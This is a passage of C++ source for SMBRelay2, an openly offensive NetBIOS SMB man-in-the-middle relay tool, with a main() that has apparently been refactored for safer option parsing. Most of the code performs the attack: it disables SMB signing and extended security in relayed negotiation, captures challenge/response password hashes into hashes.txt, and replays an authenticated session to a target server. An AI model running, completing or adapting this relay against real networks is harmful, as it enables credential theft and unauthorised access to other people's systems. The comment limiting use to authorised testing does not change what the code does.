📄 smbrelay2.cpp
pTreeConnectAnd2->PasswordLen = 1;
pTreeConnectAnd2->ByteCount = 32;
char *ptr = (char *)(pTreeConnectAnd2 + 1);
*ptr = 0;
ptr++;
WCHAR *wptr = (WCHAR *)ptr;
swprintf(wptr, L"\\\\%S\\IPC$", hostname);
pTreeConnectAnd2->ByteCount = (wcslen(wptr) + 1) * 2;
wptr += wcslen(wptr) + 1;
ptr = (char *)wptr;
strcpy(ptr, "?????");
pTreeConnectAnd2->ByteCount += 7;
inncb.ncb_length = sizeof(SMBHEADER) + psessionsetupand2->Len * 2 + psessionsetupand2->ByteCount + 2 + pTreeConnectAnd2->Len * 2 + pTreeConnectAnd2->ByteCount + 4 ;
}
break;
case SESSION_SETUP_ANDHEADER2EX_LEN: // Win2000
fprintf(stderr, "Security blob len: %d\n", psessionsetupand2ex->SecurityBlobLen);
break;
default:
fprintf(stderr, "Unknown setup header length %d\n", psessionsetupand->Len);
break;
}
break;
}
}
if (g_DebugLevel > 2)
fprintf(stderr, "Sending query to target server\n");
NBSend(&outncb, buff, inncb.ncb_length);
if (g_DebugLevel > 2)
fprintf(stderr, "Receiving response from target server\n");
if (!NBRecv(&outncb, (PUCHAR)buff, sizeof(buff)))
{
NBHangup(&inncb);
return ;
}
switch (psmbheader->Command)
{
case SMB_COM_NEGOTIATE:
SessionID = pdialectselectheader->UniqueSessionKey;
if (pdialectselectheader->EncryptionKeyLen )
{
fprintf(stderr, "Challenge (%d bytes): ", pdialectselectheader->EncryptionKeyLen);
PrintHexString((BYTE *)(pdialectselectheader + 1), pdialectselectheader->EncryptionKeyLen);
memcpy(challenge, pdialectselectheader + 1, 8);
fprintf(stderr, "\n");
}
if (pdialectselectheader->bSecuritySignaturesRequired )
{
fprintf(stderr, "Security signatures required by server *** THIS MAY NOT WORK!\n");
pdialectselectheader->bSecuritySignaturesRequired = 0;
}
if (pdialectselectheader->bExtendedSecurity)
{
fprintf(stderr, "Disabling extended security *** THIS MAY NOT WORK!\n");
pdialectselectheader->bExtendedSecurity = 0;
}
if (pdialectselectheader->bSecuritySignaturesEnabled)
{
fprintf(stderr, "Disabling security signatures\n");
pdialectselectheader->bSecuritySignaturesEnabled = 0;
}
// copy negotiation response for relaying later
memcpy(negotiateheaders, buff, sizeof(negotiateheaders));
break;
case SMB_COM_SESSION_SETUP_ANDX:
if (psmbheader->NTError == 0)
{
if (strlen(username))
bConnected = TRUE;
if (psessionsetupandresponse->Action & 1)
{
fprintf(stderr, "Connected as guest\n");
}
if (/* psmbheader->bUnicodeStrings*/TRUE )
{
WCHAR *ptr = (WCHAR *)(psessionsetupandresponse + 1);
if ((DWORD)ptr % 2)
ptr = (WCHAR *)((char *)ptr +1);
fprintf(stderr, "OS: \"%S\"\n", ptr);
ptr += wcslen(ptr) + 1;
fprintf(stderr, "Lanman type: \"%S\"\n", ptr);
ptr += wcslen(ptr) + 1;
fprintf(stderr, "Domain: \"%S\"\n", ptr);
}
else
{
char *ptr = (char *)(psessionsetupandresponse + 1);
fprintf(stderr, "OS: \"%s\"\n", ptr);
ptr += strlen(ptr) + 1;
fprintf(stderr, "Lanman type: \"%s\"\n", ptr);
ptr += strlen(ptr) + 1;
fprintf(stderr, "Domain: \"%s\"\n", ptr);
ptr += strlen(ptr) + 1;
}
if (strlen(username))
{
memcpy(logonandconnectheaders, buff, sizeof(logonandconnectheaders));
UID = psmbheader->UserID;
}
}
else
{
fprintf(stderr, "Login failure code: 0x%08X\n", psmbheader->NTError );
}
break;
}
if (!bConnected)
{
if (g_DebugLevel > 2)
fprintf(stderr, "Sending response to target client");
NBSend(&inncb, buff, outncb.ncb_length);
}
fprintf(stderr, "\n");
}
NBHangup(&inncb);
FILE *file;
file = fopen("hashes.txt", "a");
if (file != NULL)
{
fprintf(file, "%s\\%s:3:", hostname, username);
for (x = 0; x < 8; x++)
fprintf(file, "%02X", challenge[x]);
fprintf(file, ":");
for (x = 0; x < 24; x++)
fprintf(file, "%02X", caseinsensitivepassword[x]);
fprintf(file, ":");
for (x = 0; x < 24; x++)
fprintf(file, "%02X", casesensitivepassword[x]);
fprintf(file, "\n");
fclose(file);
fprintf(stderr, "Password hash written to disk\n");
}
if (bConnected)
{
fprintf(stderr, "Connected?\n");
if (!NBAddName(RelayName, &inncb) )
{
NBHangup(&outncb);
fprintf(stderr, "Unable to add relay name\n");
return ;
}
while (bConnected && !g_bQuit)
{
if (!NBListen(&inncb))
{
fprintf(stderr, "Error receiving relay connetion\n");
NBHangup(&outncb);
return ;
}
fprintf(stderr, "*** Relay connection for target %s received from ", hostname);
PrintNetBIOSName(inncb.ncb_callname);
fprintf(stderr, "\n");
bContinue = TRUE;
BOOL bLogonDone = FALSE;
BOOL bDialectSelected = FALSE;
do
{
BOOL bDoSend = TRUE;
// if (g_DebugLevel > 2)
// fprintf(stderr, "Receiving request from relay\n");
if (!NBRecv(&inncb, (PUCHAR)buff, sizeof(buff)))
{
bContinue = FALSE;
}
if (inncb.ncb_length == 0)
bDoSend = FALSE;
if (bContinue && bDoSend)
{
if (psmbheader->MagicVal != SMBMAGICVAL )
{
if (g_DebugLevel > 0)
fprintf(stderr, "Non SMB message, magicval: %08x length %d bytes target %s\n", psmbheader->MagicVal, inncb.ncb_length, hostname);
}
else
{
if (g_DebugLevel > 0)
fprintf(stderr, "%s\n", GetCommandType(psmbheader->Command));
}
switch (psmbheader->Command)
{
case SMB_COM_LOGOFF_ANDX:
fprintf(stderr, " *** Logoff from target %s\n", hostname);
bDoSend = FALSE;
bContinue = FALSE;
break;
case SMB_COM_NEGOTIATE:
if (!bDialectSelected)
{
char *ptr = (char *)(psmbheader + 1) + 3;
int selecteddialect = 0;
x = 0;
bDialectSelected = TRUE;
while (selecteddialect == 0 && ptr < buff + inncb.ncb_length)
{
if (g_DebugLevel > 0)
fprintf(stderr, "%d - Dialect %d - %s\n", x, *ptr, ptr+1);
x++;
ptr += strlen(ptr+1) + 2;
// locate dialect of choice
if (strcmp(ptr+1, LANMANDIALECT_NTLM012) == 0)
selecteddialect = x;
}
memcpy(buff, negotiateheaders, sizeof(negotiateheaders));
pdialectselectheader->Len = SMBDIALECTSELECTHEADER_LEN;
pdialectselectheader->DialectIndex = selecteddialect;
ptr = (char *)(pdialectselectheader + 1);
// put encryption key here
memcpy(ptr, "!!!!!!!!", 8);
ptr += SMBENCRYPTIONKEYLEN ;
if (/*psmbheader->bUnicodeStrings*/TRUE)
{
swprintf((WCHAR *)ptr, L"%S", SERVERDOMAINNAME);
pdialectselectheader->ByteCount = SMBENCRYPTIONKEYLEN + (strlen(SERVERDOMAINNAME) + 1) * 2;
}
else
{
strcpy(ptr, SERVERDOMAINNAME);
pdialectselectheader->ByteCount = SMBENCRYPTIONKEYLEN + strlen(SERVERDOMAINNAME) + 1;
}
inncb.ncb_length = sizeof(SMBHEADER) + sizeof(SMBDIALECTSELECTHEADER) + pdialectselectheader->ByteCount ;
fprintf(stderr, " *** Sent dialect selection response (%d) for target %s\n", selecteddialect, hostname );
NBSend(&inncb, buff, inncb.ncb_length);
bDoSend = FALSE;
}
break;
case SMB_COM_SESSION_SETUP_ANDX:
if ( !bLogonDone )
{
bLogonDone = TRUE;
WORD MID = psmbheader->MultiplexID;
WORD AndXCommand = psessionsetupand->AndXCommand ;
memcpy(buff, logonandconnectheaders, sizeof(logonandconnectheaders) );
psmbheader->MultiplexID = MID;
psmbheader->UserID = UID ;
outncb.ncb_length = sizeof(SMBHEADER) + psessionsetupandresponse->Len * 2 + psessionsetupandresponse->ByteCount + 2;
// truncate it if necessary
if (AndXCommand == SMB_NONE)
{
psessionsetupandresponse->AndXCommand = SMB_NONE;
psessionsetupandresponse->AndXOffset = 0;
}
else
{
PTREE_CONNECT_ANDRESPONSEHEADER ptreeconnectand = (PTREE_CONNECT_ANDRESPONSEHEADER)( (char *)psmbheader + psessionsetupandresponse->AndXOffset );
ptreeconnectand->Len = TREE_CONNECT_ANDRESPONSEHEADER_LEN;
ptreeconnectand->AndXCommand = SMB_NONE;
ptreeconnectand->AndXOffset = 0;
ptreeconnectand->AndXReserved = 0;
ptreeconnectand->OptionalSupport = 0;
char *ptr = (char *)(ptreeconnectand + 1);
strcpy(ptr, "IPC");
ptreeconnectand->ByteCount = strlen(ptr) + 3;
ptr += strlen(ptr) + 1;
*ptr = 0;
ptr++;
*ptr = 0;
outncb.ncb_length += ptreeconnectand->Len * 2 + ptreeconnectand->ByteCount + 4;
}
fprintf(stderr, " *** Sent SMB Session setup response for relay to %s\n", hostname);
NBSend(&inncb, buff, inncb.ncb_length);
bDoSend = FALSE;
}
break;
}
}
if (bContinue && bDoSend )
{
if (g_DebugLevel > 2)
fprintf(stderr, "Sending request to target server\n");
NBSend(&outncb, buff, inncb.ncb_length);
}
if (bContinue && !g_bQuit)
{
if (!NBRecv(&outncb, (PUCHAR)buff, sizeof(buff)))
{
fprintf(stderr, "Error receiving response from target");
bContinue = FALSE;
}
if (bContinue && !g_bQuit && outncb.ncb_length > 0)
{
if (g_DebugLevel > 0)
fprintf(stderr, "Received %d byte response from target %s\n", outncb.ncb_length , hostname);
if (g_DebugLevel > 2)
fprintf(stderr, "Sending response to relay client\n");
NBSend(&inncb, buff, outncb.ncb_length);
}
}
Sleep(5);
} while (bContinue && !g_bQuit);
fprintf(stderr, " *** Relay disconnected from target %s\n", hostname);
}
}
NBHangup(&inncb);
NBHangup(&outncb);
}
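/*
 * Parse a decimal integer option value.
 *
 * atoi() silently turns junk into 0 and never reports overflow, so a
 * mistyped /A or /D value would be used without any warning.  This accepts
 * only a fully consumed decimal number that fits in an int.
 *
 * Returns 1 and stores the result in *out on success, 0 otherwise
 * (*out is left untouched on failure).
 */
static int ParseIntOption(const char *text, int *out)
{
    char *end = NULL;
    long value;

    if (text == NULL || *text == '\0')
        return 0;
    value = strtol(text, &end, 10);
    if (*end != '\0')
        return 0;                       /* trailing non-digits */
    if (value != (long)(int)value)
        return 0;                       /* does not fit in an int (only detectable where long is wider) */
    *out = (int)value;
    return 1;
}

/*
 * Fetch the value that must follow the option at argv[*index].
 *
 * On success advances *index to the value and returns it.  When the option
 * is the last argument, prints the "Missing argument" message (to stdout,
 * as before) and returns NULL without touching *index.
 */
static char *OptionValue(int argc, char *argv[], int *index)
{
    /* *index > argc - 2  <=>  argv[*index + 1] does not exist */
    if (*index > argc - 2)
    {
        fprintf(stdout, "Missing argument for %s\n", argv[*index]);
        return NULL;
    }
    ++*index;
    return argv[*index];
}

/*
 * Entry point: parse the command line, register the local NetBIOS name and
 * hand every accepted session to ConnectionHandlerThread.
 *
 * Options (all of the form /X value): /A LANA number, /D debug level,
 * /L local (spoofed) name, /R relay name, /S source name, /T target name;
 * /? and /H print usage.  Arguments not starting with '/' are reported and
 * ignored.
 *
 * This is an offensive tool: it registers a NetBIOS name and relays the SMB
 * authentication of whatever client connects to it.  Run it only on a
 * network you are authorised to test.
 *
 * Returns 0 after an explicit help request; EXIT_FAILURE on a bad option,
 * a missing or non-numeric value, or when NetBIOS setup or listening fails.
 * (The original returned 0 on every path, which made failures invisible to
 * a calling script.)  The accept loop itself never returns normally.
 */
int main(int argc, char* argv[])
{
    NCB inncb;
    int MaxSessions = 20;
    int MaxNames = 32;
    /* Name registered on the LANA.  Only the first NCBNAMSZ bytes form the
     * NetBIOS name; the rest of the 32-byte buffer is slack for
     * ParamToNetBIOSName(). */
    char LocalName[32] = "SERVER ";
    int x;

    fprintf(stderr, "SMBRelay2 v.98 - NetBIOS level SMB man-in-the-middle relay attack\n");

    for (x = 1; x < argc; x++)
    {
        char *opt = argv[x];
        char *value;
        int number;

        if (opt[0] != '/')
        {
            fprintf(stderr, "Bad argument: %s\n", opt);
            continue;
        }

        /* A bare "/" has opt[1] == '\0' and lands in the default case.
         * The cast avoids undefined behaviour in toupper() for a negative
         * plain char (non-ASCII bytes on the command line). */
        switch (toupper((unsigned char)opt[1]))
        {
        case 'A':       /* LANA number */
            if ((value = OptionValue(argc, argv, &x)) == NULL)
            {
                Usage();
                return EXIT_FAILURE;
            }
            if (!ParseIntOption(value, &number))
            {
                fprintf(stderr, "Bad numeric value for %s: \"%s\"\n", opt, value);
                Usage();
                return EXIT_FAILURE;
            }
            g_LanaNum = number;
            break;
        case 'D':       /* debug level */
            if ((value = OptionValue(argc, argv, &x)) == NULL)
            {
                Usage();
                return EXIT_FAILURE;
            }
            if (!ParseIntOption(value, &number))
            {
                fprintf(stderr, "Bad numeric value for %s: \"%s\"\n", opt, value);
                Usage();
                return EXIT_FAILURE;
            }
            g_DebugLevel = number;
            break;
        case 'L':       /* name to register locally */
            if ((value = OptionValue(argc, argv, &x)) == NULL)
            {
                Usage();
                return EXIT_FAILURE;
            }
            ParamToNetBIOSName(LocalName, value);
            /* Force the last (suffix) byte; 0x20 is presumably the
             * server-service suffix -- confirm against nb30.h. */
            LocalName[NCBNAMSZ-1] = 0x20;
            break;
        case 'R':       /* name the relay victims connect to */
            if ((value = OptionValue(argc, argv, &x)) == NULL)
            {
                Usage();
                return EXIT_FAILURE;
            }
            ParamToNetBIOSName(RelayName, value);
            RelayName[NCBNAMSZ-1] = 0x20;
            break;
        case 'S':       /* our name as seen by the target */
            if ((value = OptionValue(argc, argv, &x)) == NULL)
            {
                Usage();
                return EXIT_FAILURE;
            }
            ParamToNetBIOSName(SourceName, value);
            /* NOTE(review): unlike /L, /R and /T no suffix byte is forced
             * here; presumably deliberate for the client-side name, but
             * confirm. */
            break;
        case 'T':       /* target server */
            if ((value = OptionValue(argc, argv, &x)) == NULL)
            {
                Usage();
                return EXIT_FAILURE;
            }
            ParamToNetBIOSName(TargetName, value);
            TargetName[NCBNAMSZ-1] = 0x20;
            break;
        case '?':
        case 'H':
            Usage();
            return 0;
        default:
            fprintf(stdout, "Bad option: \"%s\"\n", opt);
            Usage();
            return EXIT_FAILURE;
        }
    }

    if (!NBReset(g_LanaNum, MaxSessions, MaxNames))
        return EXIT_FAILURE;
    if (!NBAddName(LocalName, &inncb))
    {
        fprintf(stderr, "Unable to add local name\n");
        return EXIT_FAILURE;
    }

    /* Accept loop.  Each accepted session is handed to a worker as a pointer
     * to the single NCB declared above, and the next NBListen() reuses that
     * same NCB.  The Sleep() is all that keeps the worker from seeing the
     * NCB overwritten, so it presumably copies it immediately on startup --
     * TODO confirm in ConnectionHandlerThread; a per-session copy handed to
     * the thread would be the robust form.  Only a failed NBListen() leaves
     * this loop. */
    for (;;)
    {
        if (!NBListen(&inncb))
        {
            fprintf(stderr, "Error listening\n");
            return EXIT_FAILURE;
        }
        if (_beginthread(ConnectionHandlerThread, 0, &inncb) == -1L)
        {
            /* Previously ignored: the session was accepted but nobody
             * services it.  Report it; the NCB is simply reused by the
             * next NBListen(). */
            fprintf(stderr, "Unable to start connection handler thread\n");
        }
        Sleep(150);
    }
}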